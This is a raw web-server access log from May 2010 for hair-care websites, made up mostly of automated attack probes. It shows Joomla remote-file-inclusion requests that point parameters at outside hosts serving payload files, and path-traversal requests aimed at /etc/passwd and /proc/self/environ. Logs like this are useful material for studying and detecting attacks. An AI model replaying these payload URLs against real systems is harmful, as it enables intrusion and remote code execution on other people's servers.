88.191.94.188 - - [31/May/2010:07:29:55 -0700] "GET /logs/access_100412.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:07:29:55 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:07:29:58 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:07:29:58 -0700] "GET /logs/access_100412.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:07:29:59 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:07:30:03 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:07:30:09 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:07:32:00 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:07:32:25 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.73.161.132 - - [31/May/2010:07:34:29 -0700] "GET /logs/access_100322.log%20%20//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://xovev.110mb.com/z1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.73.161.132 - - [31/May/2010:07:34:29 -0700] "GET /logs//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://xovev.110mb.com/z1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.73.161.132 - - [31/May/2010:07:34:29 -0700] "GET /components/com_remository/admin.remository.php?mosConfig.absolute.path=http://xovev.110mb.com/z1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.73.161.132 - - [31/May/2010:07:34:42 -0700] "GET /logs//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://xovev.110mb.com/z1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.73.161.132 - - [31/May/2010:07:34:43 -0700] "GET /components/com_remository/admin.remository.php?mosConfig.absolute.path=http://xovev.110mb.com/z1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.73.161.132 - - [31/May/2010:07:34:43 -0700] "GET /logs/access_100322.log%20%20//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://xovev.110mb.com/z1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.109.108.186 - - [31/May/2010:07:34:55 -0700] "GET /logs/access_091102.log/index.php?option=com_quran&action=viewayat&surano=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
210.109.108.186 - - [31/May/2010:07:34:56 -0700] "GET /index.php?option=com_quran&action=viewayat&surano=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
210.109.108.186 - - [31/May/2010:07:34:57 -0700] "GET /logs/index.php?option=com_quran&action=viewayat&surano=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
216.129.119.40 - - [31/May/2010:07:39:29 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
121.190.102.21 - - [31/May/2010:07:40:22 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [31/May/2010:07:40:23 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [31/May/2010:07:40:23 -0700] "GET /logs/access_100125.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.181.7.103 - - [31/May/2010:07:45:37 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13728 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
94.23.11.114 - - [31/May/2010:07:45:53 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.23.11.114 - - [31/May/2010:07:45:53 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.23.11.114 - - [31/May/2010:07:45:53 -0700] "GET /logs/access_100412.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.110.147.156 - - [31/May/2010:07:45:54 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
94.23.11.114 - - [31/May/2010:07:46:45 -0700] "GET /logs/access_100510.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.23.11.114 - - [31/May/2010:07:46:46 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.23.11.114 - - [31/May/2010:07:46:47 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.23.11.114 - - [31/May/2010:07:46:47 -0700] "GET /logs/access_091221.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.23.11.114 - - [31/May/2010:07:46:56 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.23.11.114 - - [31/May/2010:07:46:56 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.23.11.114 - - [31/May/2010:07:46:56 -0700] "GET /logs/access_091221.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.23.11.114 - - [31/May/2010:07:47:07 -0700] "GET /logs/access_100412.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.23.11.114 - - [31/May/2010:07:47:08 -0700] "GET /logs/access_100412.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.23.11.114 - - [31/May/2010:07:47:29 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.23.11.114 - - [31/May/2010:07:47:29 -0700] "GET /logs/access_100412.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.23.11.114 - - [31/May/2010:07:47:29 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.23.11.114 - - [31/May/2010:07:48:12 -0700] "GET /logs/access_100510.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.115.111.245 - - [31/May/2010:07:50:19 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [31/May/2010:07:50:19 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
121.190.102.21 - - [31/May/2010:07:51:56 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [31/May/2010:07:51:56 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [31/May/2010:07:51:56 -0700] "GET /logs/access_100125.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.226.235.149 - - [31/May/2010:07:52:21 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
121.190.102.21 - - [31/May/2010:07:53:42 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [31/May/2010:07:53:43 -0700] "GET /logs/access_100222.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [31/May/2010:07:53:43 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [31/May/2010:07:53:56 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.190.102.21 - - [31/May/2010:07:53:56 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.190.102.21 - - [31/May/2010:07:53:57 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.190.102.21 - - [31/May/2010:07:54:00 -0700] "GET /logs/access_100201.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [31/May/2010:07:55:14 -0700] "GET /logs/access_100222.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [31/May/2010:07:55:14 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [31/May/2010:07:55:14 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [31/May/2010:07:55:21 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [31/May/2010:07:55:21 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [31/May/2010:07:55:22 -0700] "GET /logs/access_100308.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [31/May/2010:07:55:36 -0700] "GET /logs/access_100201.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [31/May/2010:07:55:58 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [31/May/2010:07:55:58 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [31/May/2010:07:55:58 -0700] "GET /logs/access_100308.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.109.28.218 - - [31/May/2010:07:56:30 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "growlonghairfast.com"
208.109.28.218 - - [31/May/2010:07:56:30 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "growlonghairfast.com"
121.190.102.21 - - [31/May/2010:07:56:51 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [31/May/2010:07:56:52 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [31/May/2010:07:56:52 -0700] "GET /logs/access_100412.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [31/May/2010:07:58:21 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.190.102.21 - - [31/May/2010:07:58:21 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.190.102.21 - - [31/May/2010:07:58:21 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
88.191.94.188 - - [31/May/2010:08:04:28 -0700] "GET /canal.php?meio=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:08:04:28 -0700] "GET /logs/canal.php?meio=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:08:04:28 -0700] "GET /logs/access_100510.log/canal.php?meio=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:08:04:28 -0700] "GET /logs/canal.php?meio=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:08:04:28 -0700] "GET /logs/access_100510.log/canal.php?meio=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:08:04:29 -0700] "GET /canal.php?meio=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:08:05:00 -0700] "GET /canal.php?meio=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:08:05:00 -0700] "GET /logs/canal.php?meio=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:08:05:00 -0700] "GET /logs/access_100510.log%20%20/canal.php?meio=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:08:05:04 -0700] "GET /logs/access_100510.log%20%20/canal.php?meio=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:08:05:04 -0700] "GET /logs/canal.php?meio=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:08:05:04 -0700] "GET /canal.php?meio=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:08:05:15 -0700] "GET /logs/access_100419.log/canal.php?meio=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:08:05:16 -0700] "GET /logs/access_100419.log/canal.php?meio=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:08:06:02 -0700] "GET /logs/access_100419.log%20%20/canal.php?meio=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:08:06:03 -0700] "GET /logs/access_100419.log%20%20/canal.php?meio=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.133.201.194 - - [31/May/2010:08:10:01 -0700] "GET /logs/access_091102.log//index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
174.133.201.194 - - [31/May/2010:08:10:01 -0700] "GET /index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
174.133.201.194 - - [31/May/2010:08:10:01 -0700] "GET /logs//index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
94.23.221.57 - - [31/May/2010:08:12:17 -0700] "GET /logs/access_091102.log//index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.23.221.57 - - [31/May/2010:08:12:17 -0700] "GET /index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.23.221.57 - - [31/May/2010:08:12:18 -0700] "GET /logs//index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.23.221.57 - - [31/May/2010:08:12:31 -0700] "GET /logs/access_091102.log//index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.23.221.57 - - [31/May/2010:08:12:31 -0700] "GET /index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.23.221.57 - - [31/May/2010:08:12:31 -0700] "GET /logs//index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
70.38.11.213 - - [31/May/2010:08:14:14 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1" "growlonghairfast.com"
174.133.201.194 - - [31/May/2010:08:14:17 -0700] "GET /index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
72.32.2.216 - - [31/May/2010:08:14:30 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck" "growlonghairfast.com"
72.52.247.162 - - [31/May/2010:08:14:34 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck" "growlonghairfast.com"
85.94.199.36 - - [31/May/2010:08:14:49 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "growlonghairfast.com"
174.133.201.194 - - [31/May/2010:08:14:52 -0700] "GET /logs/access_091102.log//index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
174.133.201.194 - - [31/May/2010:08:14:52 -0700] "GET /index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
174.133.201.194 - - [31/May/2010:08:14:52 -0700] "GET /logs//index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
93.89.215.70 - - [31/May/2010:08:15:41 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "growlonghairfast.com"
174.133.201.194 - - [31/May/2010:08:16:07 -0700] "GET /logs/access_091102.log//index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
174.133.201.194 - - [31/May/2010:08:16:08 -0700] "GET /index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
174.133.201.194 - - [31/May/2010:08:16:08 -0700] "GET /logs//index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
122.112.32.51 - - [31/May/2010:08:16:32 -0700] "GET /?mosConfig.absolute.path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
122.112.32.51 - - [31/May/2010:08:16:32 -0700] "GET /logs/?mosConfig.absolute.path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 200 5657 "-" "Mozilla/5.0" "growlonghairfast.com"
173.203.115.77 - - [31/May/2010:08:16:32 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
122.112.32.51 - - [31/May/2010:08:16:33 -0700] "GET /logs/access_100222.log%20%20/?mosConfig.absolute.path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.109.108.186 - - [31/May/2010:08:17:29 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
